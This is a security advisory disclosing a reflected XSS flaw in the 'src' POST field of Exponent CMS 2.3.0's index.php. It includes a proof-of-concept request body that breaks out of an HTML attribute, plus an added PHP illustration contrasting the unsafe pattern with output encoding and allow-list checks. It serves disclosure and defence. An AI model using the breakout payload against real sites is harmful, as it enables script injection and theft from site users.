Title: 		exponent-2.3.0 CMS index.php POST Reflected XSS
Severity: 	High
CVE-ID: 	To Be Assigned
Release Date:	20 September 2014 
Author: 	Kenneth F. Belva
Websites:	http://silverbackventuresllc.com
		http://xssWarrior.com 
		http://securitymaverick.com
Twitter: 	@infosecmaverick
Contact:	Please use website contact form.
Mail: 
URL: 		http://sourceforge.net/projects/exponentcms/
Vendor: 
Remote Exploit:	Yes

Discovered with: xssWarrior - http://xssWarrior.com

Description:
============

Reflected XSS via the src field of a POST request to index.php.


Proof of Concept :
==================


http://[domain]/exponent-2.3.0/exponent-2.3.0/index.php

int=&src="/>[code]<"&controller=search&search=&action=none
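
Added example, not code from Exponent CMS or from the advisory author: one way to close this class of bug in PHP, assuming the posted src value is echoed back inside a double-quoted HTML attribute (which the "/> prefix in the PoC body suggests). The function names, the allow-list pattern and the sample value are hypothetical.

```php
<?php
// Added illustration, not Exponent CMS code. Assumes the posted "src" value
// is written back into a double-quoted HTML attribute.

// Vulnerable pattern: raw request value concatenated into the attribute.
function render_src_unsafe(string $src): string
{
    return '<input type="hidden" name="src" value="' . $src . '" />';
}

// Hardened pattern: encode for the HTML attribute context at output time.
function render_src_safe(string $src): string
{
    $encoded = htmlspecialchars($src, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="src" value="' . $encoded . '" />';
}

// Defence in depth: reject values outside an allow-list before using them.
// The permitted character set is an assumption made for this example.
function src_is_valid(string $src): bool
{
    return preg_match('/\A[A-Za-z0-9_@-]{0,64}\z/', $src) === 1;
}

// Count the elements an HTML parser sees in a fragment. More than one
// element means the value left its attribute and created new markup.
function element_count(string $html): int
{
    libxml_use_internal_errors(true); // input may be deliberately malformed
    $doc = new DOMDocument();
    $doc->loadHTML('<html><body>' . $html . '</body></html>');
    $body = $doc->getElementsByTagName('body')->item(0);
    return $body->getElementsByTagName('*')->length;
}

// Constructed sample with the same shape as the PoC body; an inert <b>
// element stands in for the [code] placeholder.
$sample = '"/><b>marker</b><"';

printf("passes allow-list: %s\n", src_is_valid($sample) ? 'yes' : 'no');
printf("elements (unsafe): %d\n", element_count(render_src_unsafe($sample)));
printf("elements (safe):   %d\n", element_count(render_src_safe($sample)));
echo render_src_safe($sample), "\n";
```

Encoding at the point of output is the primary fix; the allow-list check only narrows what reaches the template and does not replace it.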